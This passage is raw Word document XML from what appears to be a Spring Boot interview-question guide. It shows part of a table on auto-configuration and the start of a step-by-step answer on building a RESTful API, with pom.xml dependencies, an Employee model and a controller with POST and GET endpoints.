          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@SpringBootApplica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exclud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DataSourceAutoConfiguration</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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2386D6" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FF734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5C8A958">
          <v:rect id="_x0000_i2509" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F8904B" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF7345">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47"/>
        <w:gridCol w:w="3070"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w14:paraId="79DCCA5D" w14:textId="77777777" w:rsidTr="00FF7345">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58C44AD6" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00EC6849">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7D77D96B" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00EC6849">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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w14:paraId="4F41E484" w14:textId="77777777" w:rsidTr="00FF7345">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="264C5297" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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ableAutoConfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5909279F" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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ables auto-configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w14:paraId="1F0296DA" w14:textId="77777777" w:rsidTr="00FF7345">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DE8690E" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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factories / AutoConfiguration.imports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48131467" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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s config classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w14:paraId="1B23A7D9" w14:textId="77777777" w:rsidTr="00FF7345">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4161DE18" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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ditional... annotations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="629221B2" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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trol when config should apply</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w14:paraId="4B828776" w14:textId="77777777" w:rsidTr="00FF7345">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41EADED0" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF73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orks based on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A72A721" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF7345" w:rsidP="00FF7345">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sspath + Config + Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="699397FA" w14:textId="77777777" w:rsidR="00FF7345" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FF734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158150">
          <v:rect id="_x0000_i2510" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3514CDF3" w14:textId="05C01508" w:rsidR="008C4546" w:rsidRPr="00CE4B95" w:rsidRDefault="008C4546" w:rsidP="008C4546">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="574" w:name="_Toc196308054"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you create a RESTful API in Spring Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="574"/>
    </w:p>
    <w:p w14:paraId="6CA8E5CF" w14:textId="2986D8C4" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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To create a </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful API</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26851596" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Set Up Spring Boot Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A99D7CF"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You can set up a Spring Boot project using </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Initializr</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or by creating it manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF90281" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2030"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Via Spring Initializr</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE1F4B1" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2030"/>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Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="000108F2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Spring Initializr</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0074FE60" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2030"/>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Choose the following options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234F54B6" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2030"/>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Project: Maven Project (or Gradle if you prefer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571878F" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2030"/>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Language: Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A5C31" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2030"/>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Spring Boot: Select the latest stable version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5FA0DD" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2030"/>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Project Metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AB08B1" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2030"/>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Group: com.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D792FF1" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2030"/>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Artifact: restapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D30E885" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2030"/>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Name: restapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58552A74" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2030"/>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Package: com.example.restapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A92F5" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2030"/>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Dependencies: Spring Web, Spring Boot DevTools, Spring Data JPA (Optional for database interaction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F4B3A6" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2030"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Manually</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a Maven/Gradle project with dependencies for Spring Boot, Spring Web, and other necessary dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C9756" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Add Dependencies in pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D668246"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If you chose to set up manually, ensure the following dependencies are included in the pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0B4F0"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lt;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004A1842"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359150E0"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D8845C"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artifactId&gt;spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675A7D42"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158443E4"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 Optional, for database interaction --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2D3F6C"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E6D18C"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A01D45B"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artifactId&gt;spring-boot-starter-data-jpa&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C817F"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0340C832"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 Optional, for working with databases --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674CDE95"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B03F1B8"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groupId&gt;com.h2database&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315CE66D"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artifactId&gt;h2&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5400C17B"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scope&gt;runtime&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B7C60"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAF4FE9"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lt;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239959BD" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Create a Model Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D147510"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This class represents the data that your API will expose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DBB2A4"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package com.example.restapi.model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B611087" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C3C170"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public class Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E0E0F1"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rivate Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B22761C"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rivate String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5419F40D"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rivate String department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B47570" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6009ED94"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 Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EC20D4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B46299" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Create a Controller Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B374B8A"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The controller defines the RESTful API endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1359E3AC"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package com.example.restapi.controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7FFEBE" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5CC73F"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import com.example.restapi.model.Employee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5154780E"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import org.springframework.web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308E8575" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A2A135"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import java.util.ArrayList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F67F1"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import java.util.List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52133B6D" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DBAB40"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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74458A3E"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RequestMapping("/api/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD55E1E"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public class EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56886676" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CF943C"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rivate List&lt;Employee&gt; employees = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7693B2" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0CDB98"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 Create a new employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B513E72"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D5684B"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ublic Employee createEmployee(@RequestBody Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340EC6A9"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employees.add(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E80AD3"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return employee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F41ACB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB4A4EE" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2928075E"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 Get all employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF70DE"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    @GetMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0889FF0B"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ublic List&lt;Employee&gt; getAllEmployees() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A0F5B"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return employees;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FBDF09"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA85952" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B77A510"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 Get a specific employee by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58041D78"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GetMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EB6973"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ublic Employee getEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
